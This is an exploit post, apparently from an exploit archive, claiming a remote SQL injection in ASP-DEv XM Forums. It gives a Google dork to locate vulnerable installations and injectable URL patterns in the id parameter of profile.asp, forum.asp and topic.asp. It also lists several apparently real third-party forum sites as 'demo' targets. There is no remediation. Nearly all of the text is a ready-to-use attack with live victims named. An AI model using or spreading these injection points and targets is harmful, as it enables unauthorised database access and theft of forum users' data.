ASP-DEv XM Forums suffers from a remote SQL injection vulnerability.
8446a9b73c68c9fe39bea37f8d215078ada86454157f60f7b639e5bc719634c4
########################################################################################
# #
# Exploit Title : ASP-DEv XM Forums SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Software Link : http://www.asp-dev.com/download.asp?did=1 #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by ASP-DEv XM Forums" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/[patch]/profile.asp?$sid=&id=[SQL] #
# http://[TarGeT]/[patch]/forum.asp?$sid=&id=[SQL] #
# http://[TarGeT]/[patch]/topic.asp?$sid=&id=[SQL] #
# #
# #
# Demo : #
# #
# http://pigskinempire.com/forum/topic.asp?$sid=&id=34089' #
# http://forums.image-src.com/profile.asp?$sid=&id=1261' #
# http://forums.image-src.com/forum.asp?$sid=&id=8' #
# http://forums.image-src.com/topic.asp?$sid=&id=278' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################